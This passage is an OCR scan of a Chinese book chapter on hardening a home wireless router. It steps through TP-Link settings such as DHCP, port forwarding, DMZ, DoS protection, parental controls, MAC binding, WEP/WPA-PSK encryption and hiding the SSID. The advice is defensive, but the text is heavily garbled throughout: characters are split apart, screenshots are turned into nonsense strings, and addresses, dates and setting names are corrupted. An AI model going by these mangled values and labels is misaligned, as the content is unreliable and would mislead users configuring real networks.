客户 应 列表 


* 静态 地 址 分 配 


设置 DHCP 与 转发 规则 的 操作 步 台 
如 下 : 
[se 加 DHCP 服 务 ， 这 里 可 以 设置 地 址 池 的 
开始 与 结束 位 置 ， 还 可 以 设置 地 址 使 用 时 
间 、 网 关 、DNS 服 务 器 等 ， 如 下 图 所 示 。 


本 中 由 器 内 建 的 DMCr 甩 从 器 腕 自动 吧 轩 局 城 网 中 各 计算 机 Ter /tf 协议 < 


DHC? 服 务 器 : 
地 址 邮 开 始 地 址 : 。 [192155.1.100 
地 址 池 结 束 地 址 : 。 [192168.1.199 
地 址 租 期: 120 分 钟 《1 
网 站: 1000 
十 省 域名 : 

主 DNS 服 务 吕 : 
车 用 DNS 服务 器 : 


保存 | [帮助 


[step 图 客户 端 列表 ， 这 里 可 以 显示 出 连接 路 
由 器 的 客户 端 ， 其 中 包括 客户 端的 名 称 、 
MAC 地 址 、IP 地 址 以 及 登录 时 间 。 遇 有 网 
络 故障 可 以 从 这 个 列表 排查 可 疑 客户 端 ， 
如 下 图 所 示 。 


不 启用 国良 用 


2060 信 钟 ， 读 省 为 120 分 钟 
《可 过 


[3 
《( 梧 迁 ) 
[3 


O00 
00 
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虚拟 服务 器 ， 虚 拟 服 务 器 定义 了 广 域 
网 服务 端口 和 局 域 网 网 络 服务 器 之 间 的 映 
射 关系 ， 所 有 对 该 广域网 服务 端口 的 访问 
将 会 被 重 定 位 给 通过 IP 地 址 指定 的 局 域 网 网 
络 服务 器 ， 如 下 图 所 示 。 


点 以 服 务 器 定义 了 | ive eanipecnt ng 所 有 于 读 广博 可 
台 务 放 口 的 访问 将 全 衬 生 定位 结 请 过 IT 池 直 指定 的 局 网 络 办 务 器 


豆 LEE] EE By | We 
i] EE] [RE [SEE 
EE EI 


[sep 图 特殊 应 用 程序 ， 某 些 程序 需要 多 条 链 
接 ， 如 Internet 游 戏 、 视 频 会 议 、 网 络 电 话 
等 。 由 于 防火 墙 的 存在 ， 这 些 程序 无 法 在 
简单 的 NAT 路 由 下 工作 。 设 定 转发 规则 给 
特殊 应 用 程序 实现 NAT 地 址 转换 ， 如 下 图 
所 示 。 


一 程 订 天 法 存 简单 YIAT 宿 直下 工作 ， 村 天 记 朋 得 友 宙 8 革 点 这 样 的 上 用 多 序 能 只 在 NM 
四 下 工作 


mT Wm | Weny | HN | HD [S| 
E37 
EJ 


[step 国 DMZ 主 机 ， 在 某 些 特殊 情况 下 ， 需 
要 让 局 域 网 中 的 一 台 计 算 机 完全 暴露 给 广 
域 网 ， 以 实现 双向 通信 ， 此 时 可 以 把 该 计 
算 机 设置 为 DMZ 主 机 ， 如 下 图 所 示 。 


在 梨 此 特区 情 品 下 ， 震 要 让 局 | 卉 问 中 的 一 各 计算 机 完全 暴露 给 广域网 ; 以 实 
现 观 语 通信 ， 此 全] 以 把 该 计算 机 设置 大 mz 主机 。 


了 搞 太 : 二 让 用 轩 不 启用 


了 主机 Ff 把 址 : 
保存 帮助 


0500 


[step 国 UPnP 设 置 ，UPnP 的 应 用 范围 非常 
广 ， 以 致 足够 可 以 实现 许多 现成 的 、 新 的 
及 令 人 兴奋 的 方案 ， 包 括 家 庭 自 动 化 、 打 
印 、 图 片 处 理 、 厨 房 设备 、 汽 车 网 络 和 公 
共 集 会 场所 的 类 似 网 络 等 ， 如 下 图 所 示 。 


本 而 流 因 /时 未 me 省 BS 人 PH。 


ue 开 自 


Tm] SR 


EE3 遇 E7J 


a 


13.1.5 ”安全 设置 与 家 长 控制 


安全 设置 针对 一 些 可 能 遭受 的 网 络 攻击 
进行 防御 ， 家 长 控制 则 可 以 控制 未 成 年 人 浏 
览 固定 网 页 以 及 上 网 时 间 ， 如 下 图 所 示 。 


进行 安全 设置 与 家 长 控制 的 操作 步骤 
如 下 : 
在 路 由 功能 列表 中 选择 “安全 设置 ” 选 
项 下 的 “高 级 安全 设置 ”选项 ， 进 入 “高 级 安 
全 设置 ”界面 ， 在 其 中 可 以 进行 相关 参数 的 
设置 并 阅读 相关 注意 事项 ， 如 下 图 所 示 。 
[ass | 


本 再 设置 高 贺 志 全 防范 配置 
注意 ; 【、 Va “DOs 也 击 防范 ”， 后 本 8 于 才 隔 如 生效 。 


统计 时 间 间 末 : 《5~e0) 107] 秒 


Ds 区 击 防 范 : 不 启用 司 记 用 

开启 PP-FLo00 欢 击 过 噬 : 

Top-Finnn 才 所 和 六 值 : (5~36m) 。 [0 包公 

开启 WP- 了 LD00 讨 活 : 

Wm-Fuoo 寺 提包 才 值 : (5~3600) [E00 包 /各 

开启 TcP-SWiFLD0D 攻 击 过 虑 : 

TCP-sn-TL000 数 据 也 珊 值 : ‘5~3600》 [50 也 / 秘 

到 日 末 自 WAHDb9Fing: 

本 止 来 目 LAND 的 Fine 电 通过 路 由 基 : 《防范 可 击 下 六 毒 ) 
保存 | [本 动 ] [DoS 补 本 主 机 列表 


[sep 图 选择 “ 远 端 WEB 管 理 ” 选 项 ， 在 打 
开 的 界面 中 可 以 设置 路 由 器 的 WEB 管 理 端 
口 和 广域网 中 可 以 执行 远 端 WEB 管 理 的 计 
算 机 IP 地 址 ， 在 设置 前 请 阅读 相关 注意 事 
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项 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 WEB 管理 油 口 和 广域网 中 可以 执行 远 端 和 E3 管 理 的 计算 机 的 
下 地 址 。 


注意 : ”1. 路由 器 默认 的 YEP 管理 端口 为 0， 如 果 您 改变 了 默认 的 是 8 管理 
端口 《例如 隐 为 8) ， 则 您 必须 用 “TP 地 址 :端口 ”的 方式 《例如 
http://192. 168. 1.1:88》 才 能 登录 路 由 器 执行 EB3 界 面 管理 。 此 功 
散 需 要 重 害 路 由 器 才能 生效 。 
2。 路 由 器 默认 Nn 为 0. 0.0.0， 在 此 点 认 状态 
下 ， 广域网 中 所 有 计算 机 都 不 i 这 内 和 和 理 ， 如 
果 您 忆 交 了 黑 认 的 远 端 YEE 管 理 菇 地 址 《例如 改 为 202. 96. 12.8) ， 
则 广博 汉中 只 有 具有 指定 IT 地 址 〈 例 如 202. 96. 12.6) 的 计算 机 才 
能 登录 路 由 器 执行 远 端 WEB 管理。 如 果 插 远 庙 YEH 管 理 IT 地 址 设 为 
255 .255. 255. 255， 那 么 ,广域网 中 所 有 的 计算 机 都 可 以 登录 路 由 
器 执行 运 端 VEF 管 理 。 
3. 如 果 YEE 管 理 端 口 与 “转发 规则 ”中 虚拟 服务 器 条 目的 端口 产生 
冲突 , 当 您 保存 醒 置 时 ， 存 在 端口 冲突 的 虚拟 服务 器 条 目 将 被 自动 


禁用 。 
2 管理 消 口 : 四 
运 端 YE 管理 TP 地址 : 。 [0.000 
确定 | [帮助 


[step 图 在 路 由 功能 列表 中 选择 “家 长 控制 ” 
选项 ， 即 可 进入 “家 长 控制 设置 ”界面 ， 
用 户 可 以 通过 本 界面 控制 小 孩 的 上 网 行 
为 ， 使 得 小 孩 的 计算 机 只 能 在 指定 时 间 访 
问 指定 的 网 站 ， 如 下 图 所 示 。 


让， 全 3 


不 在 抽出 寺中 的 市 家 二 ?5 本 元 法 | 
FH 多 不 向 9 
sm [ ] 
Scat: 
[E23 
四 MC 地 寺 EE 日 鹅 计划 E23 LE 
ET EE 
| [| [RR [WW 
| 可 


[Step 加 单 击 “ 增 加 单个 条 目 ” 按 钮 ， 进 入 
“家 长 控制 规则 设置 ”界面 ， 如 下 图 所 
示 。 本 界面 中 的 日 程 计划 基于 路 由 器 的 系 
统 时 间 ， 用 户 可 以 在 “系统 工具 一 时 间 设 
置 ”中 查看 和 设置 系统 时 间 。 

[rss | 


本 页 设置 一 条 家 长 控制 条 目 
本 页 面 中 的 日 程 计划 蔓 于 路 由 器 的 系 5 关 j 间 ， 您 可 以 在 “系统 工具 ~) 时 间 讼 
置 ” 中 查看 和 设置 系统 9 间 。 


过 Io 地 址 : 

当前 局 二 冯 中 PFC83UC 地 址 : 
给 人 f 计 前 风 站 列表 一 个 指 述 : 
从 证 外 防 访问 8 站 域名 : 


EE 


痢 望 在 哪些 时 仿生 让 任何 时 间 
坟 亲 以 在 “上 表 控 -> 日 计划" 中 设置 H 间 列 
胡 


[要 存 ] [到 日 | [请 盈 
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侈 注意 : 一 旦 开启 家 长 控制 功能 ， 不 在 规 
则 列表 中 的 计算 机 将 无 法 上 网 。 


访问 扫 标 设 于 
坊 页 吕 鹿 a 标 信息 


-| 


EE EE [号 


I 
EE 


13.1.6 ”上 网 控制 与 路 由 功能 

上 网 控制 可 以 对 路 由 器 的 规则 、 主 机 
列表 、 访 问 目 标 以 及 日 程 计 划 进 行 设置 ， 
路 由 功能 则 可 以 添加 路 由 表 。 


主机 下 


访问 目标 
日 程 计划 
路 由 功能 

具体 操作 步骤 如 下 : 
在 路 由 功能 列表 中 选择 “上 网 控制 ” 
选项 下 的 “规则 管理 ”选项 ， 即 可 进入 
“上 网 控制 规则 管理 ”界面 ， 在 本 界面 ， 
用 户 可 以 打开 或 者 关闭 此 功能 ， 并 且 设 定 
默认 的 规则 。 更 为 有 效 的 是 ， 用 户 可 以 设 
置 灵活 的 组 合 规则 ， 通 过 选择 合适 的 “ 主 
机 列表 ”“ 访 问 目标 ”“ 上 日程 计 划 ”， 构 
成 完整 而 又 强大 的 上 网 控制 规则 ， 如 下 图 


E23 
二 二 | [二 于] 党 [7] 页 这 部 


[Step 国 选择 “日 程 计划 ”选项 ， 进 入 “日 程 
计划 设置 ”界面 ， 在 其 中 可 以 设置 上 网 控 
制 的 日 程 计 划 ， 如 下 图 所 示 。 

EE 
本 页 设置 上 网 控制 和 日 程 计划 


了 EE EE El [3 
EEEERS 


[ES 
本 六 [J 区 届 


[step 图 选择 路 由 功能 列表 “路 由 功能 ”选项 
下 的 “静态 路 由 表 ” 选 项 ， 进 入 “静态 路 
由 表 ” 设 置 界 面 ， 在 其 中 可 以 设置 路 由 器 
的 静态 路 由 信息 ， 如 下 图 所 示 。 


ss | 
本 页 设置 中 由 器 gy 称 术 中 由 信息 。 
EY WET 2 | 
ET 

| EE [本 克 


13.1.7 ”MAC 绑 定 与 动态 DNS 


IP 与 MAC 绑 定 在 一 起 便于 网 络 管理 ， 
在 一 定 程度 上 防止 ARP 病 毒 的 传播 ， 也 可 


[step 图 选择 “主机 列表 ”选项 ， 进 入 “主机 
列表 设置 ”界面 ， 在 其 中 可 以 设置 内 部 主 
机 列表 信息 ， 如 下 图 所 示 。 

[im | 


本 而 没 轨 内 入 主机 列表 信息 
rr | EE I EE 1 三 | 
3 
ET EE | 
ED ED [本 而 


Be 国 选择 “访问 目标 ”选项 ， 进 入 “访问 
目标 设置 ”界面 ， 在 其 中 可 以 设置 访问 目 
标 信息 ， 如 下 图 所 示 。 
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在 一 定 程度 上 限制 随意 算 改 IP 地 址 的 现象 。 
动态 DNS 是 指 没 有 固定 IP 的 主机 利用 动态 
DNS 服 务 ， 帮 助 主机 随 着 人 P 的 改变 更 新 域名 
与 了 的 关联 。 


ARP 映射 表 


动态 DNS 


设置 MAC 绑 定 与 动态 DNS 的 操作 步骤 
如 下 : 
[step 图 在 路 由 功能 列表 中 选择 “IP 与 MAC 
绑 定 ”选项 下 的 “静态 ARP 绑 定 设置 ” 选 
项 ， 在 打开 的 界面 中 可 以 设置 单机 的 MAC 
地 址 和 了 地 址 的 匹配 规则 ， 如 下 图 所 示 。 


订 页 设置 音 机 的 mc 地 址 和 地 志 的 开本 损 风 | 

Am 证: 国 不 自用 让 倚 存 | 
瑟 TE EE E33 

1 ET ET 部 EE 


期 哩 个 条 目 | [ 俩 所 有 条 目 生 葡 | [ 使 所 有 条 正夫 区 | | 出 队 所 有 条目 | [ 查 拔 找 二 条 目 | 
下 页 | [页 | 光 第 [07] 页 [项 而 
[step 图 选择 “ARP 映 射 表 ”选项 ， 在 打开 的 
界面 中 可 以 绑 定 IP 与 MAC 的 主机 ， 也 可 导 
入 或 删除 现 有 ARP 映 射 表 ， 如 下 图 所 示 。 


[ET ar T ar THWET RE | 
Teer | eo rm | FE [SX] [WR] 


3 


人 SN] |[ 副 新 ] [ 诛 克 | 


在 路 由 功能 列表 中 选择 “动态 DNS 设 
置 ”选项 ， 在 打开 的 界面 中 可 以 设置 Oray. 
com 花 生 过 DDNS 的 参数 。 这 里 需要 先 注册 
一 个 花生 沉 账 号 ， 如 下 图 所 示 。 
FE 


本 页 设置 “0ray em 花生 过 DDNS ”的 每 数 。 
脂 劳 商 钳 欣 ; 花生 壳 动 态 域名 朋 析 服 基 由 请 。。 花生 这 站 太志 名 衣 折 服务 都 盈 
服务 提供 者 ; [花生 亮 (【wwworaycom) "| 注册 
用 户 名 : 
密码 : 
启 了 DIS: 。 辐 
连接 状态 : 未 连接 
服务 类 型 : - - - 
域名 信息 : 。 无 
注意 : 您 成 功 登 录 之 后 , 需要 先 过 出 才能 使 月 其 他 帐号 登录 。 
登录 |] [退出 
保存 | | 帮助 


13.1.8 ”路 由 器 系统 工具 的 设置 


路 由 器 的 系统 工具 主要 用 于 路 由 器 
的 控制 管理 ， 其 中 包括 时 间 设置 、 诊 断 工 
有 具 、 软 件 升 级 、 恢 复出 厂 、 备 份 还 原 、 路 
由 重启 、 口 令 修改 等 功能 ， 如 下 图 所 示 。 


第 13 章 ”加 固 无 线 网 络 的 大 门 


进入 路 由 器 系统 工具 设置 的 操作 步骤 
如 下 : 
[step 图 在 路 由 功能 列表 中 选择 “系统 工具 ” 
选项 下 的 “时 间 设 置 ” 选 项 ， 在 打开 的 界 
面 中 可 以 设置 路 由 器 的 系统 时 间 ， 用 户 还 
可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获 
取 标 准 的 GMT 时 间 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 系统 时 间 ， 您 可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获取 标 
准 的 gr 时 间 。 


注意 : 关闭 路 由 器 电 源 后 ， 时 间 信息 会 丢失 ， 当 您 下 次 开机 连 上 Internet 后 ， 
路 由 器 构 会 自动 获取 QT 时 间 。 您 必须 先 广 上 Internet 菊 取 9T 时 间或 到 此 页 设 
置 时 间 后 ,其 他 功能 中 的 时 间 限 定 才能 生效。 


时 区 : |_(GMT+ 08-00) 北京 ， 重庆 ， 己 重 木 齐 ， 香 洪 特 别 行政 区 ， 台北 " 
日 期 : [2606“] 年 下 月 上 日 
时 间 : [9 时 [27 分 [5 秒 
优先 使 用 FT 服务 器 1: 0000 
优先 使 用 NT 服务 器 2:。 [0.00.0 


蒜 取 GMT 疝 ] ( 仅 在 连 上 互联 网 后 才能 获取 am 时 间 ) 


保存 | |[ 才 助 


侈 注意: 关闭 路 由 器 电源 后 ， 时 间 信 息 会 
丢失 ， 当 您 下 次 开机 连 上 Internet 后 ， 路 由 
器 将 会 自动 获取 GMT 时 间 。 您 必须 先 连 上 
Internet 获 取 GMT 时 间或 在 此 界面 设置 时 间 
后 ， 其 他 功能 中 的 时 间 限 定 才能 生效 。 


[step 图 选择 “诊断 工具 ”选项 ， 在 打开 的 界 
面 中 可 以 使 用 Ping 或 者 tracert 诊 断路 由 器 的 
连接 状态 ， 如 下 图 所 示 。 


HE NT 
者 数 设 置 
选择 操作 : piag = OTrowrt 
开 地 址 /类 名 
Ping 包 数 目 : 4 (1-50) 
Ping 也 大 小 : 64 《4-1472 字 节 》 
Ting 时 [B00 《100-2000 毫 种 》 
Tracert 跳 熬 : [20 (1-30) 
EE 
路 由 喧 已 经 总结 * 
EINEL) 


step 图 选择 “软件 升级 ”选项 ， 在 打开 的 界 
面 中 可 以 通过 官方 发 布 的 软件 版 本 ， 对 现 
有 路 由 进行 软件 升级 ， 如 下 图 所 示 。 


a 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


ss 
通过 升级 本 路 由 器 的 软件 ， 您 将 获得 新 的 功能 。 
文件 名 : 


WTB45nv2-cn-up bin 


TPTP 服务 器 IP: [192158.1100 
当前 软件 版 本 : 4.19. 18 Build 130123 Rel. 32879n 
当前 硬件 版 本 : 。 WR845N 2.0 00000000 


注意 : 请 使 用 有 线 LAN 口 连接 进行 软件 升级 。 升 织 时 请 选择 与 当前 硬件 版 本 
一 致 的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 否 刚 将 导致 路 由 器 损 坏 而 无 法 
使 用 。 升 锅 过 程 约 40 秒 ， 当 升 锅 结束 后 ， 路 由 器 桂 会 自动 重新 启动 * 


升级 


侈 注意 : 请 使 用 有 线 LAN 口 连接 进行 软件 
升级 。 升 级 时 请 选择 与 当前 硬件 版 本 一 臻 
的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 
否则 将 导致 路 由 器 损坏 而 无 法 使 用 。 升 级 
过 程 约 40s， 当 升级 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 

Eeep 贺 选择 “恢复 出 厂 设置 ”选项 ， 在 打开 
的 界面 中 单 击 “ 恢 复出 厂 设置 ”按钮 ， 可 
以 将 路 由 器 的 所 有 设置 恢复 到 出 厂 时 的 默 
认 状 态 ， 如 下 图 所 示 。 

[tr | 
单 击 此 按 扭 将 使 路 由 器 的 所 有 设置 恢复 到 出 厂 8 折 98 认 状 态 。 


[项 FE] 
ED 


选择 “备份 和 载 入 配置 文件 ”选项 ， 
在 打开 的 界面 中 可 以 保存 当前 路 由 器 的 设 
置 。 建 议 在 修改 配置 及 升级 软件 前 备份 当前 
的 配置 文件 ， 当 然 也 可 以 通过 选择 备份 的 配 
置 文件 恢复 之 前 的 配置 ， 如 下 图 所 示 。 


用 份 和 井 入 配置 文件 


您 可 以 在 这 保存 您 的 设置 。 我 们 建议 您 在 修改 配置 及 升级 软件 前 备份 您 的 可 
置 文件 。 


备份 配置 文件 
您 可 以 通过 载 入 配置 文件 来 恢 夏 您 的 设置 。 
路 径 : [| 选择 文件 | 未 选择 任何 文件 载 入 配置 文件 


注意 : 1。 导入 配置 文件 后 ， 设 备 中 原 有 的 用 户 配置 桂 会 去 失 。 如 果 您 载 
入 的 醒 置 文件 有 误 ， 可 能 会 导致 设 备 无 法 被 管理 。 
2， 载 入 可 置 文件 的 过 程 不 能 关闭 路 由 器 电源 ， 否 风 | 档 导致 路 由 器 


损坏 而 无 法 使 用 。 载 入 过 程 约 20 秒 ， 当 载 入 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 


step 较 选择 “重启 路 由 ”选项 ， 在 打开 的 界 
面 中 单 击 “ 重 启 路 由 器 ”按钮 ， 可 以 重新 
启动 路 由 器 ， 如 下 图 所 示 。 
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重启 党 由 善 

单 击 此 按钮 将 使 路 由 器 重新 启动 。 
重启 路 由 器 
EI | 


[step 国 选择 “修改 登录 口令 ”选项 ， 在 打开 
的 界面 中 可 以 修改 系统 管理 员 的 用 户 名 与 
口令 ， 建 议 配置 完 路 由 器 后 重新 设置 管理 
员 的 账号 密码 ， 防 止 黑客 使 用 弱 口 令 登 录 
路 由 ， 如 下 图 所 示 。 


修 光 本 录 口 令 


本 页 修改 系统 管理 员 的 用 户 名 及 口令 ， 用 户 名 及 口令 长 度 不 能 超过 14 个 字 
节 。 


原 用 户 名 : 
原 口令: 
新 用 户 名 : 
新 口令 : 
确认 新 口令 : 


EE | 


[ep 图 选择 “系统 日 志 ” 选 项 ， 在 打开 的 
界面 中 可 以 查看 系统 上 日志， 其 中 包括 管理 
员 登 录 信 息 、 路 由 健康 状态 等 。 如 果 路 由 
器 被 非法 修改 ， 可 以 通过 日 志 查看 进行 排 
除 ， 如 下 图 所 示 。 

CE 


过 引 日 志和 内定 


[step 图 选择 “流量 统计 ”选项 ， 在 打开 的 界 
面 中 可 以 分 别 对 路 由 器 总 的 数据 流量 以 及 
最 近 10s 内 的 数据 流量 进行 统计 。 默 认 情 况 
是 关闭 的 ， 如 有 需要 可 以 打开 。 在 网 络 遭 
受 攻击 时 ， 通 过 数据 流量 的 分 析 对 找 出 攻 


击 主机 也 是 非常 有 帮助 的 ， 如 下 图 所 示 。 


3 
Er 


| MR | #0 CE EE 医 


当前 统计 教 杠 为 室 


EI EDI MC] 


未 [5 ] 行 可 芭 


13.2 无 线路 由 器 的 安全 策略 


无 线路 由 器 本 身 自 带 有 安全 设置 选 
项 ， 通 过 设置 这 些 安全 选项 ， 可 以 提高 
无 线路 由 器 的 安全 性 能 ， 从 而 不 受 黑 客 
攻击 。 


13.2.1 设置 复杂 的 管理 员 密码 


路 由 器 的 初始 密码 比较 简单 ， 为 了 保 
证 局 域 网 的 安全 ， 一 般 需 要 修改 或 设置 管 
理 员 密 码 ， 具 体 的 操作 步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设置 界面 ， 
选择 “系统 工具 ”选项 下 的 “修改 登录 密 
码 ” 选 项 ， 打 开 “ 修 改 管理 员 密码 ”工作 
界面 ， 如 下 图 所 示 。 


日 rwmaash < 于 
© | wr 女 


TIP-LINIK 


[step 国 在 “ 原 密码 ”文本 框 中 输入 原来 的 
密码 ， 在 “新 密码 ”和 “确认 新 密码 ” 文 
本 框 中 输入 新 设置 的 密码 ， 最 后 单 击 “ 保 
存 ” 按 钮 即 可 ， 如 下 图 所 示 。 
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© Twnsssy x 于 ER 


过 © | rmt 广 | 三 


TP-LINK 


13.2.2 无 线 网 络 WEP 加 密 


WEP 采 用 对 称 加 密 机 理 ， 数 据 的 加 密 
和 解密 采用 相同 的 密 钥 和 加 密 算法 。 下 面 
详细 介绍 无 线 网 络 WEP 加 密 的 具体 方法 。 


1. 设置 无 线路 由 器 WEP 加 密 数 据 


打开 路 由 器 的 Web 后 台 设 置 界面 ， 单 击 
左 侧 “ 无 线 参数 ”一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 菜 单 中 选择 WEP 选 项 ， 在 “ 密 
钥 格式 选择 ”下 拉 菜 单 中 选择 “ASC II 
码 ” 选 项 。 设 置 密 钥 ， 在 “ 密 钥 1” 后 面 
的 “ 密 钥 类 型 ”下 拉 列 表 中 选择 “64 位 ” 
选项 ， 在 “ 密 钥 内 容 ” 文 本 框 中 输入 要 使 
用 的 密码 ， 本 实例 输入 密码 为 cisco， 单 击 
“保存 ”按钮 ， 如 下 图 所 示 。 


安全 提示 :为 保障 网 络 安 全 ， 强 烈 推荐 开启 安全 设置 ， 并 使 用 
As 加密 方 法 。 


TEA-PSK/WFA2-FSK 
万 开启 安全 设置 
安全 类 型: [本 了 
人 [Ea 
密 钥 格式 选择 : SC 习 


选择 64 位 密 钥 需 输入 16 进 制 数字 符 10 个 ， 或 者 ASCII 
码 字符 5 个 。 选择 126 位 密 钥 需 输 入 16 进 制 数字 符 28 


本 必要 了 。。 个 ,或 者 AsCII 码 字符 13 个 选择 152 位 外 村 输入 l8 
进 制 数字 符 32 个 ， 或 者 ASCII 码 字符 16 个 。 
EE EELE 0 
ELe | [sd 区 蕊 可 
ET ES 
密 角 3 全 本 可 
ET EE 
[oa 


六 入 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


2. 客户 端 连 接 接 情 况 。 下 图 所 示 表 明 已 经 成 功 连 接 无 线 
需要 WEP 加 密 认证 的 无 线 客户 端 连 接 ”党 时 

的 具体 操作 步骤 。 Fo 

[Bep 国 单 击 系统 桌面 右 下 角 有 图 标 ， 无 线 时 es aa 


客户 端 自动 扫描 到 附近 区 域内 的 所 有 无 线 Ee 


无 和 网 阁 连 接 


信号 ， 如 下 图 所 示 。 


13.2.3 ”WPA-PSK 安 全 加 密 算法 
WPA-PSK 可 以 看 成 是 一 个 认证 机 制 ， 
只 要 求 一 个 单一 的 密码 进入 每 个 无 线 局 域 
只 
右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 es 
中 选择 “连接 ”选项 ， 如 下 图 所 示 。 i 
WPA-PSK 或 者 WPA2-PSK 加 密 无 线 网 络 。 


当前 连接 到 : 与 
语 和 mee9 1. 设置 无 线路 由 器 WPA-PSK 安 全 加 密 
无 线 网 洁 连 接 a 数据 
pe [Be5 国 打开 路 由 器 的 Web 后 台 设置 界面 ， 先 
和 | 择 左 侧 “ 无 线 参数 ”一 “基本 设置 ”选项 ， 
a 了 选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 列 表 中 选择 “WPA-PSK/WAP2- 
PSK” 选 项 ， 在 “安全 选项 ”和 “加 密 方 
| es 法 ”下 拉 菜 单 中 均 选择 “自动 选择 ”选项 ， 


在 “PSK 密 码 ” 文 本 框 中 输入 加 密 密 码 ， 本 
弹出 “连接 到 网 络 ”对 话 框 ， 在 “ 安 ”实例 设置 密码 为 sushi1986， 如 下 图 所 示 。 
全 密 钥 ”文本 框 中 输入 密码 cisco， 单 击 RE 
“确定 ”按钮 ， 如 下 图 所 示 。 i 


厂 开户 sridee 功 能 
去 全 提示 为 保障 问 络 安全 ， 强 列 推荐 开启 安全 设置 ， 并 使 用 
WPA-PSK/WPA2-FSK AES 加 密 方法 。 

把 开启 安全 设置 

去 全 类 到 : ES)| 

安全 选项 EE 

加 字 方 法 : EE 

Ps: 最 反 为 5 个 字符 ， 最 长 为 63 个 字符 
ET 
组 宙 锡 新 半 贿 ; [55400 ] 单位 为 秒 ,最 小 值 为 50 不 更 新 则 为 0) 


[EEes 国 单 击 系统 桌面 右 下 角 贺 图标， 将 鼠标 大 本 项 而 
放 在 tp-link 选 项 上 ， 可 以 看 到 无 线 信号 的 连 [sep 图 单 击 “ 保 存 ”按钮 ， 在 弹出 的 提示 对 


| 
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话 框 中 单 击 “ 确 定 ” 按 钮 ， 重 新 启动 路 由 
器 即 可 ， 如 下 图 所 示 。 
192.168.1.1 上 的 网 页 显示 : 
砚 人 人 轨 新 宇 动 咯 二 锋 ? 
确定 台湾 


2. 使 用 WPA-PSK 安 全 加 密 认 证 的 无 线 
客户 端 。 
step 图 单 击 系 统 菏 面 右 下 角 辆 图 标 ， 无 线 客 
户 端 会 自动 扫描 区 域内 的 无 线 信号 ， 如 下 
图 所 示 。 


当前 连接 到 : 


= 未 识别 的 网 络 
无 Internet 访问 


无 线 网 络 连 接 


tp-link 


右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 中 
选择 “连接 ”菜单 命令 ， 如 下 图 所 示 。 


= 一 
当前 连接 至: 
二 = 未 识别 的 网 络 
无 Internet 访问 


无 线 网 络 连 接 和 
pink | 这 Ey 
tzgs EF | 
204 P| 


TP-UNK SW 


step 图 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 sushi1986， 单 击 
“确定 ”按钮 ， 如 下 图 所 示 。 


第 13 章 “加固 无 线 网 络 的 大 门 ES 


键入 网 络 安全 密 钥 


安全 老 角 (S): sushi1986 


上 篇 过 字符 (H) 


单 去 系统 浊 面 右 下 角 加 国标 ， 将 名 村 
放 在 tp-link 信 号 上 ， 可 以 看 到 无 线 信号 的 连 
接 情况 。 下 图 所 示 表明 已 经 成 功 连接 无 线 
路 由 器 。 
下 
tp-link 
Internet 访问 
a 
元 颖 网 阁 壬 深 


tp-link 


TP-UNK_SW 


SSID: tp-link 


打开 网 络 和 共享 中 心 


人 移 提 示 : 在 WPA-PSK 加 密 算法 的 使 用 过 程 
中 ， 密 码 设置 应 该 尽 可 能 复杂 ， 并 且 要 注 
意 定 期 更 改 密码 。 


13.2.4 禁用 SSID 广 播 


SSID 就 是 一 个 无 线 网 络 的 名 称 ， 无 线 
客户 端 通过 无 线 网 络 的 SSID 来 区 分 不 同 的 
无 线 网 路 。 为 了 安全 起 见 ， 往 往 要 求 无 线 
AP 禁止 广播 该 SSID， 只 有 知道 该 无 线 网 络 
SSID 的 人 员 才 可 以 进行 无 线 网 络 连 接 ， 禁 
用 SSID 广 播 的 具体 操作 步骤 如 下 。 


1. 设置 无 线路 由 器 禁用 SSID 广 播 


无 线路 由 器 禁用 SSID 广 播 的 具体 操作 
步骤 如 下 。 
[se 图 打开 路 由 器 的 Web 后 台 设置 界面 ， 设 
置 无 线 网 络 的 SSID 人 信息， 取消 选中 “允许 
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SSID 广 播 ” 复 选 框 ， 单 击 “ 保 存 ” 按 钮 ， 
如 下 图 所 示 。 


本 页 面 设置 路 由 器 无 线 隔 络 的 基本 参 教 和 安全 认证 选 硕 * 


ssms: 
频段 : 
模式 : 


ssh 
自动 选择 局 
[Subps (B02 119 | 


网 开户 无 线 功能 
厂 ftifssmr 揪 


厂 开启 Bridgs 功 能 
安全 提示 ;为 保障 网 络 安全 ， 强 列 推 荐 开启 安全 设置 ,并 使 用 
WPA-FSK/WPA2-PSK AES 加 密 方法 > 


由 开局 安全 设置 
安全 天 型 : [ES 本 
去 全 选项 ; [IEEEEE| 


step 图 弹出 一 个 提示 对 话 框 ， 单 击 “ 确 定 ” 
按钮 ， 重 新 启动 路 由 器 ， 如 下 图 所 示 。 


192.168.1.1 上 的 网 页 显示 : 
确认 重新 启动 中 器? 
EE 
2. 客户 端 连接 
禁用 SSID 广 播 的 无 线 客户 端 连接 的 具 
体操 作 步 又 如 下 。 


[seep 国 单 击 系统 桌面 右 下 角 圆 图标， 会 看 到 
无 线 客户 端 自 动 扫描 到 区 域内 的 所 有 无 线 
信号 ， 会 发 现 其 中 没有 SSID 为 ssh 的 无 线 网 
络 ， 但 是 会 出 现 一 个 名 称 为 “其 他 网 络 ” 
的 选项 ， 如 下 图 所 示 。 


当前 连接 到 : 


二 = 未 识别 的 网 络 
TY 无 Internet 访 问 


无 线 网 络 连 接 


SW-IT 
TP-LUNK SW 


其 他 网 络 
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step 图 右 击 “其 他 网 络 ”选项 ， 在 弹出 的 快 
捷 菜 单 中 选择 “连接 ”选项 ， 如 下 图 所 示 。 


[step 图 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “名 
